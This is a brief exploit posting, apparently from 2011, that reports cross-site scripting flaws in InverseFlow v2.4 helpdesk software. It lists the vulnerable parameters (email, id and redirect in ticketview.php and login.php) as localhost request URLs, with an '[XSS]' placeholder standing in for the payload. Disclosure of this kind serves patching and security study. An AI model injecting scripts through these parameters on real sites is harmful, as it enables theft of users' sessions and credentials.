# Exploit Title: InverseFlow v2.4 [XSS Vulnerabilities] # Date: [Mon Nov 07 2011] # Author: Amir Expl0its # We Are : Expl0its , Higher_sense , Black.spook & H4ckcity.net - zone-hc.com # Software Link: [ http://asria.info/download/script/inverseflow.zip ] # Version: [ InverseFlow v2.4 ] Vulnerable Page: ticketview.php?email= ticketview.php?email=&id= login.php Exploit: http://127.0.0.1/inver/inverseflow/ticketview.php?email= [XSS] http://127.0.0.1/inver/inverseflow/ticketview.php?email=&id=[XSS] http://127.0.0.1/inver/inverseflow/login.php?redirect=[XSS]